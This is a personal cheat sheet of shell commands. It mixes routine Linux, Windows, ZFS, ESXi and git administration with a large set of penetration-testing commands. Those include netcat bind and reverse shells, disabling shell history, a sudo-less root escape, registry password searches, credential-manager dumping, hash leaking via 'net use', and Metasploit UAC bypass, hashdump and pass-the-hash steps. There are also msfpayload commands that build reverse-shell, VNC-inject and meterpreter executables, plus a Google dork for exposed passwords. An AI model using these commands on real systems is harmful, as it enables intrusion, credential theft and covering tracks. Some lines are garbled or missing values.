legal contact rss

commands to memorize/know

More to come, be shure....

This is an ongoing project of things I need all the time but somehow doesn't stick to my brain and needs a place to live to be remembered every day.

Very special thx to SYNjunkie for his inspiration


shell command description
netstat -Tul show all active waiting sockets
update-rc.d [service] enable enables the service to start automatically at boot time
| cut -d "[delimiter]" -f [field number to extract] print out the defined field [-f x] of a line of text
for [variablename] in $(cat input.txt); do [comand] $variablename; done action each line of an textfile with [command]
nc -nv 110 connect netcat to IP port 110 (client)
nc -nlvp 4444 have netcat receive data on port 4444 (server)
nc -nlvp 4444 > incoming.exe have netcat receive data and write this to incoming.exe
nc -nlvp 4444 -e cmd.exe have netcat offer a shell on port 4444
nc -nv 4444 -e /bin/bash have netcat send (and start) a remote shell on the dest. system
ncat ­‐exec cmd.exe ­‐allow ‐vnl 4444 ­‐ssl have netcat allow a shell access via SSL from source only
tcpdump -i eth0 -nX dump eth0 & display data in HEX
nmap -v -p 139,445 --script-args=unsafe=1 --script=smb-check-vulns [target IP] Check for SMB vulns
nmap -T4 -O [target ip-range] noisy but quick scan
Acquire::http::proxy ""; Acquire::https::proxy ""; Acquire::ftp::proxy ""; apt to use proxy (/etc/apt/apt.conf)
unset HISTFILE deactivate writing down command history for the duration of your session
set HISTFILE=/~/.bash_history revert the above deactivation
Add more space or new disk in vmware
cfdisk create LVM (type 8e) partition
pvcreate /dev/[new partition]
vgs write down the VG name
vgextend [VG name] /dev/[new partition]
lvextend -rl +100%FREE /dev/[VG name]/[mount point name] Use all available space and also resize
resize2fs -p /dev/[VG name]/[mount point name] oder: lvextend --resizefs -l +100%FREE /dev/[VG name]/[mount point] grub-mkdevicemap update-grub Create the data layout at the new space
df -h check if new space is available
timedatectl check the system time and other time configs
sudo timedatectl set-timezone Europe/Berlin set the timezone to Europe/Berlin
[shift] Hold shift while booting to enter extd. boot menu.
at linux= add init=/bin/bash at the end of line boot into bash
mount -o remount,rw / remount root as RW to make changes
du -ahm ./ | sort -n -r | head -20 display the 20 biggest entries in filesystem at ./
sudo less [file] | {ESC] !/bin/sh get a shell as root from "sudo less"

Create a new GIT repository and push the initial content:

git commit -m "First commit"

git config --global --add ]/.../]

git remote add origin

git remote -v

git add .

git push origin main


shell command description
netstat -ano show all active waiting sockets
net start show all running services
pushd \\[SMB-Share\]Directory] map SMB share to the next free drive letter and chdir into it
[cmd1] && [cmd2] Run [cmd1] and if successfull run [cmd2]
psexec \\[NB-Name of dest] cmd open a remote shell on dest
psexec \\[NB-Name\Dir cmd /c [cmd1] psexec and run [cmd1]
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" Get the OS version
net users show the local user accounts
netsh firewall show state show the FW status
schtasks /query /fo LIST /v show the scheduled tasks
tasklist /SVC show the running services
DRIVERQUERY look for outdated or dodgy drivers installed
psexec @serverlist.txt -c "\\File-Server\SecurityPatches$\MS08-067.exe /quiet /norestart /overwriteoem" Use PSEXEC to deploy some software (i.e. a patch, nc, meterpreter, etc.)
gc c:\servers.txt | ForEach-Object { gwmi win32_operatingsystem -ComputerName $_ | ForEach-Object { $_.reboot() }} PS to reboot the machines in c:\servers.txt
NET LOCALGROUP Administrators List all local administrators
query session Get a list of currently logged on local users
DSQUERY USER -name *pauli* | DSGET USER -samid –display Search for user by last name within the domain
DSQUERY Server -o rdn Find the PDC
nltest /dclist:%userdomain Show all DC's of the domain your'e in
dsquery user -limit 0 List all users in the domain
dsquery user domainroot -stalepwd 180 -limit 0 List stale user accounts
dsquery user domainroot -disabled -limit 0 List disabled user accounts
reg query HKLM /f password /t REG_SZ /s find passwords in registry
cmdkey /list dump the cerdential manager information
net use file://[IP] send your hash to [IP]


shell command description
getuid display my server- and username
getprivs show my priviledges
background backround my session and give me a new cmd
use exploit/windows/local/bypassuac bypass UAC
after that: set SESSION [backgrounded session #]
after that: set PAYLOAD windows/meterpreter/reverse_tcp define the new meterpreter session to use the bypass UAC
after that: SET LHOST [Victim IP]
after that: SET LPORT´[Port to receive the new session]
clear clear your screen
ps show the active process list (with users)
migrate [process nbr] migrate my session to run as the process # user rights
hashdump dump the hash table
sessions -l display all available sessions
------------------------------------- -------------------------------------
use exploit/windows/smb/psexec Extract hashdump
set payload windows/meterpreter/reverse_tcp
set SMBPass xxxxx

Google Hacks

shell command description
intitle:index.of.dropbox passw Find open Dropbox shares with password information


shell command description
./msfpayload windows/shell_bind_tcp LPORT=4444 X > /tmp/Listen-shell.exe Create a simple Windows listener
nc [target IP] 4444 connect to listener
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=[target IP] E simple reverse shell
./msfpayload windows/vncinject/reverse_tcp LHOST= LPORT=2482 X > /tmp/reverse-vnc.exe VNC
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= LPORT=2482 DisableCourtesyShell=TRUE E
./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > met-listen.exe meterpreter listener
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=[target IP] LPORT=4444 E
setg set the variable global, so that it will last even for the next "use" command


shell command description
#Find-Files.ps1 $1 = (read-Host "Enter start date e.g yyyy/mm/dd") $2 = (read-Host "Enter finish date e.g yyyy/mm/dd") $path = (Read-Host "Enter path of target e.g \\server\c$\windows\") $results = (Read-Host "Where do you want the results saved to? e.g c:\temp\") $start = [datetime]$1 $end = [datetime] $2 $period = {$_.lastwritetime -gt $start -and $_.lastwritetime -lt $end} gci $path -Recurse | where {!$_.psiscontainer -and (.$period)} | Out-File -Width 255 $Results Thanks to this will find modified files (even on remote boxes)
Install-windowsfeature Server-Gui-Mgmt-Infra, Server-Gui-Shell -Restart Install/Enable the Server GUI on a core install
OR: Dism /online /enable-feature /featurename:ServerCore-FullServer /featurename:Server-Gui-Shell /featurename:Server-Gui-Mgmt Install/Enable the Server GUI on a core install
Import-module servermanager Uninstall-windowsfeature -name Server-GUI-Mgmt-Infra,Server-GUI-Shell Uninstall the Server GUI on a core install

remote access for monitoring

shell command description
psexec -u [domain]\[username] \\[hostname] cmd get a remote shell on [hostname]
pushd \\[server]\share map the next free drive letter to the share AND chdir into it
winpmem_1.6.2.exe %COMPUTERNAME%/%COMPUTERNAME%.dmp >>%COMPUTERNAME%/%COMPUTERNAME%.log save a memory dump
sysmon -accepteula -n -i >>%COMPUTERNAME%/%COMPUTERNAME%.log Install sysmon as a service


regex action
[^\:]+ jump to ":"

zfs - transactional file system

zpool status [pool name] -v

You can attempt to resolve more minor data corruption by using scrubbing the pool and clearing the pool errors in multiple iterations. If the first scrub and clear iteration does not resolve the corrupted files, run them again.

zpool scrub [pool name]

zpool clear [pool name]

vmware ESXi

shell commanddescription
 esxcli software profile get
get the -p parameter for next command ("


 esxcli software profile update -d -p ESXi-7.0U3n-21930508-standard --no-


update from vmware with the latest patch available for 


tor .onion

shell commanddescription
wget -qO -; echoget your real ip address
torsocks wget -qO -; echo
get your .onion-address